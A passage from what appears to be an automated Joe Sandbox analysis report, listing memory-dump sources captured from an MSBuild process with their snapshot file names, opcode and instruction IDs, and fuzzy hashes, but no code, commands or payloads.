                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92B1FAB4E21209EFDB05CF98D485A9DBBB2FF48320F158159E814AB361C771ED82CB94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 987bf0a53e1b358e1726e0dc544de22d55357649096efc706c6fc5602bc0abaa
                                                                                                                                                                                                                                                • Instruction ID: 5c28cf44c9c9a90a36e27194068760fa0047ce85cb6de032723a316815681e56
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 987bf0a53e1b358e1726e0dc544de22d55357649096efc706c6fc5602bc0abaa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6B137B4A11249EFDB14CFA8D584A9DFBF2AF88310F24C159E814AB765C770ED42CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 84dcdf088560021674e67e9fcc78e8e99ee48a6b3a65cde5b274db6a683be86b
                                                                                                                                                                                                                                                • Instruction ID: 5855a09ac79c3b4e48634ea92c168589ee8c5da79297e7e1b399b8edab761f8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84dcdf088560021674e67e9fcc78e8e99ee48a6b3a65cde5b274db6a683be86b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D81A4F0B11226EBDB360A6588447BF7AA7ABCDB50F054529ED069B2C4CF71CC418BD1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dd19defb75beb6e33123583c86241170f1da69e032b445ac75ca82ae8c4d1ac2
                                                                                                                                                                                                                                                • Instruction ID: 8c7f5d6d6bc19f74dd96b5d6923dc45ef0f71b481ee6ad73e8fc4a20436acb7c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd19defb75beb6e33123583c86241170f1da69e032b445ac75ca82ae8c4d1ac2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 269190B0700605AFDB05EB74E8986AEBBE2FFC8711F148528E5069B684DF349D058BA5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 36c1da14145820b4ba4b35847fcb10a1bd8980d5125290756532a7c9bb1cdf92
                                                                                                                                                                                                                                                • Instruction ID: 8687e6e7894897702e76b7334328297a722ca37759186753969e1a84cdcd1d87
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36c1da14145820b4ba4b35847fcb10a1bd8980d5125290756532a7c9bb1cdf92
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3B16B74600305AFC745DF64C8849AABBF2FF89220B158A99D54A8F762DB30FD49CF91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b288a6b649546724e0f9a4a23215eae51e68e13f9ec333865daeb51fbc3e970
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00615EB07002059FDB24DF65E898AADBBF5EF89314F148169E405EB3A1DB31EC41CBA5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fa6e39d7b9e0c004b9007933e4c92c112c41c381c5cab98f2bd333a0a9dc22f2
                                                                                                                                                                                                                                                • Instruction ID: 4f5fa6fa04a583da0b8370bd44613be32d8257e4e7d02c257328808587e38026
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa6e39d7b9e0c004b9007933e4c92c112c41c381c5cab98f2bd333a0a9dc22f2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F361CBB1B002058FDB15DF78D884AAEBBF2AFC8220B14C169D5169B7A4DF30EC01CB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 009290cab541e7a1cd6b594d9dff387928693ee1cc5867fff733537ae98e2ac9
                                                                                                                                                                                                                                                • Instruction ID: 766a0c3f95fdb331dd7d0d645922506f0e32f4def70f3973e1e31e453f527ed2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 009290cab541e7a1cd6b594d9dff387928693ee1cc5867fff733537ae98e2ac9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F46140B0B402169FDF54DF69C850AAEB7F6AF88610B148269D906EB354DB30DC01CBA0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 48c743bdcd9c10c5339ea9322492883141fa046f13519b8a8e951b5186dc5390
                                                                                                                                                                                                                                                • Instruction ID: 2ddfe6cad3326ebfe7508615b19f489e041bf7669ae7c9d87371ffdc32f28ad8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48c743bdcd9c10c5339ea9322492883141fa046f13519b8a8e951b5186dc5390
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2618B7060020AAFDB01DF58D880AAEFBF6FF84220B14C669D5599B251DB31FD068FA5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c8b747eb53cdbce935e892f0daf8f9ae0ea4183cd950abff147d4533b33d28e6
                                                                                                                                                                                                                                                • Instruction ID: 735861e7e2934e2094d54b130db8764fb61e7fd6228de66301de73a409ef1c8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8b747eb53cdbce935e892f0daf8f9ae0ea4183cd950abff147d4533b33d28e6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1361C4B4A012598FDB54CFA9C880A9EBBF6BF88310F14416AE919EB354D731D942CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d2ac3f6057c83abdcca753740044e53103b843a9b4b300160e20c0dabbc05a9f
                                                                                                                                                                                                                                                • Instruction ID: f5e0642a7efda60ca12401447c826cd04edbe276669622964d9bd5dd526c8b87
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2ac3f6057c83abdcca753740044e53103b843a9b4b300160e20c0dabbc05a9f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC819178E00218CFDB55DFA9D990A9DBBF2FF88310F10816AD919AB354DB30A945DF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 260c13bca9f0ec2feb5e3afe6934a9e6affc1ad9519c80a1b1d427a0f188b044
                                                                                                                                                                                                                                                • Instruction ID: 00af0ab9afa0c0c083a4a6ac312be91105a00e53fc01c8bd1f6641cf2d41f18e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 260c13bca9f0ec2feb5e3afe6934a9e6affc1ad9519c80a1b1d427a0f188b044
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA518FB06027079FDB61CF68C444AAAB7F6FF84310F158639D845CB2A1DB74E946CB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 013796d4d36359ff3666cb7a55868200640e2cbf00b9807fba047ca2b4fc61ce
                                                                                                                                                                                                                                                • Instruction ID: f626c9a7738eeb93b5167885b4186772ccf744583e4c999b68d3f4f4a5cbd39d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 013796d4d36359ff3666cb7a55868200640e2cbf00b9807fba047ca2b4fc61ce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C15190701107406FE351EF34D890BDABBE2AF81320F548A59D1468F692DB65AE0DCF9A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 87b3ddd70b83c11d5e2f6ead7510d08f910b84a1cf342089c5f6c87ef3f4323e
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0158876a6e1117e8c86d6be72f8a652668f66346e27e953d5987875b8e88f012
                                                                                                                                                                                                                                                • Instruction ID: 2f36cc4937da980ce302777f561e549f744bb1a29ad4b728bbbb92acb3e38c06
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0158876a6e1117e8c86d6be72f8a652668f66346e27e953d5987875b8e88f012
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C41C0B160E3D16FE703AB7998A46D57FB1AF83214F0A01DBD4808F193D5149C49DBAB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cc3488732b790eb0aa6dea0b85d717cbe64dfd960bc861b6bf45af56812f63ff
                                                                                                                                                                                                                                                • Instruction ID: 79a8f2278e2fd5b46cf3077eea283edc41e78bfb1a607b8c24dd3700e5affd0e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc3488732b790eb0aa6dea0b85d717cbe64dfd960bc861b6bf45af56812f63ff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33419372B143469FD721DB68D840AABB7A6EFC5320B108467D646DB242DB30ED11CBA1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 76247044f3fddffa5a5c5a43b4bf97cd107a5390bc64049d425116f2a1105ea3
                                                                                                                                                                                                                                                • Instruction ID: caeb8977a366d3b78b7ffb82f99a9415a9e5bddc196a0b74b732e59a7794b056
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76247044f3fddffa5a5c5a43b4bf97cd107a5390bc64049d425116f2a1105ea3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64518AB4900259DFDB61DF64D850AD9BBF2FF89310F0441EAC408AB251EB321E95CF94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5f0c7f330bf9c5b676fafb1334557db6c6b4423b7771f1ad1add48191433ae63
                                                                                                                                                                                                                                                • Instruction ID: 23bb5d0a8d889c36ccd227fd804486ae0bb1776ecf16d7d16f7d105754d5ec69
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f0c7f330bf9c5b676fafb1334557db6c6b4423b7771f1ad1add48191433ae63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E4127B43046009FC728CF69D48896AB7F6BF89310B1545ADE58ACB7B5CB34EC81CB40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7f3dd5e6d1f2a79d95716260c0303522a25e2aa7236afe9cf9c8cddf59529183
                                                                                                                                                                                                                                                • Instruction ID: affb6792bbfb59dc77635e1b60777dc6bb80ec6d4ccfbb1c34d496d53dd0892d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f3dd5e6d1f2a79d95716260c0303522a25e2aa7236afe9cf9c8cddf59529183
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3415775200305AFD315EB70E894A6AB7E3FBC8221B148A28D5468B781DF71FD0A8F91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5f6914a04e0965a49adfa8ae6dfeff3a994f904eea606e2e5cdff70d6aca79f2
                                                                                                                                                                                                                                                • Instruction ID: dfd80f1aa360458f5333730e65e186a1361ba3b37da5d8608aec234c3bac129a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f6914a04e0965a49adfa8ae6dfeff3a994f904eea606e2e5cdff70d6aca79f2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5651E774E10209EFDB05CFA8D484A9DFBB2FF48314F298558E405AB365C771AD82CB94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2f246b9bc04f185d6445d560509ec6a1a461acb4675388f8b90d5a8833780c6f
                                                                                                                                                                                                                                                • Instruction ID: ea913760f3d90d87c754337fc9a18f8f419d082eaba2fd7931000496a07bf9fe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f246b9bc04f185d6445d560509ec6a1a461acb4675388f8b90d5a8833780c6f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC3159B17047045F9324DB69D440AAFB7E6EFC96B1314862AE809DB380CF31ED0687D5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fbc36fe50bcb92e7734da23226a1bfe8ad7597988eb4e05e502a6e09bac15e63
                                                                                                                                                                                                                                                • Instruction ID: c0c352fc761a6209c4c754f47308db834beeeefab84c7230097e1e38aedbeb06
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbc36fe50bcb92e7734da23226a1bfe8ad7597988eb4e05e502a6e09bac15e63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D4193B4E01219DFDB54DFA9D884ADDFBB2BF89310F10816AE505AB364DB34A841CF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 54ddc8ccfc68ca6d1fc072d88a3311a4080ae420dd8bee5ad1217b5d8fefadb0
                                                                                                                                                                                                                                                • Instruction ID: 387d56a40c5d6a390fec01c240e4d0e17952c7a4d4409616dbc47c08ce7a9d72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54ddc8ccfc68ca6d1fc072d88a3311a4080ae420dd8bee5ad1217b5d8fefadb0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89412BB02107016FD395EF65D890A9AB7E2BFC1720F548A5CC1468F651DB71BD088F95
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d52f74c31fe0c7b1b1f84472fdb705291003e97dccd24bda36807d7ac5937860
                                                                                                                                                                                                                                                • Instruction ID: 47dc19afd940a93c228047758c13c7f95746c9612c89820a1f0b1aecabc49112
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d52f74c31fe0c7b1b1f84472fdb705291003e97dccd24bda36807d7ac5937860
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D41A2F1A20719DFC724DB29C9406AE73F2BF88610B00862AC5469B654DF70DD01CFD1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5d04a23232276485d8598c22041a1e98fe55848d22159fc50606ca070c623f80
                                                                                                                                                                                                                                                • Instruction ID: 4e5b59190741025ce337a93b1d72d33a37c825791f2210fda515072cd37e945c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d04a23232276485d8598c22041a1e98fe55848d22159fc50606ca070c623f80
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C741F0B4E01219DFDF58DFA9C584AEDBBB2BF89300F148129D412AB254DB349942CF55
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 09f34d6c428476b392d1b96de763a6956d442a508ca0de4a750c31e64cf17f5f
                                                                                                                                                                                                                                                • Instruction ID: 67270f9c615c32e47b05b1cc7988d5f75231ba59ad43ad0c58bed5de717abd24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09f34d6c428476b392d1b96de763a6956d442a508ca0de4a750c31e64cf17f5f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6831BFB5B102128FCB18EFB5C4955EEBBF2AF88210F114669D40A9B391DB34ED05CB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 278b18fd0c871a823856431d9729ae6b950f8f34813507a4953cd611cfa827e5
                                                                                                                                                                                                                                                • Instruction ID: 28336329e5d2b9db592ef0bcbfc9fff7a92c247f5721303bc42200a86a0d0a55
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 278b18fd0c871a823856431d9729ae6b950f8f34813507a4953cd611cfa827e5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3415B757003519FDB15DF34D8849AABBB6FF85310B148169E906CB395DB31ED01CBA1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4fa4e01d1c634a68f6b070bb4457dda2943b3fe2d3bed26dc4d5af52a21d04a0
                                                                                                                                                                                                                                                • Instruction ID: 3eda9b5ef657ceb610f26a54b3a9c6096595a575923b5a8503d2145773388488
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fa4e01d1c634a68f6b070bb4457dda2943b3fe2d3bed26dc4d5af52a21d04a0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7341E4B4A11209EFDB04CBA8D584A9DFBF2AF48314F24C158E414AB365C771ED82CF80
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e76f573acf19e157b2a045a14b9666f9d9416d10c163b453b9642a8e7ce0f30d
                                                                                                                                                                                                                                                • Instruction ID: cf5fe04fc3d4d32ba1fc5f9e9694c04e4ae1d4397af4736f5d1a4a6f6c9a45ef
